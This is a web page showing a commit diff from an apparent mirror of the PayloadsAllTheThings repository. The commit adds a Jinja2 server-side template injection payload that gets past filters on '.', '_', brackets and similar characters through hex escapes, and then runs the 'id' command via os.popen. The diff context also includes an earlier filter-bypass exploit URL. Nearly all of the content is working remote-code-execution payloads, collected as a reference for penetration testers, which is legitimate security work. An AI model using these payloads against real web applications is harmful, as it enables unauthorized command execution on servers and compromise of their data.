mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Merge pull request #181 from SecGus/master
Added RCE SSTI Jinja2 Bypass payload developed by SecGus (chivato)
This commit is contained in:
commit
a19fd013fb
@ -387,6 +387,11 @@ Bypassing `|join`
|
||||
http://localhost:5000/?exploit={{request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))}}&f=%s%sclass%s%s&a=_
|
||||
```
|
||||
|
||||
Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by https://twitter.com/SecGus:
|
||||
```python
|
||||
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
|
||||
```
|
||||
|
||||
## Jinjava
|
||||
|
||||
### Basic injection
|
||||
|
Loading…
Reference in New Issue
Block a user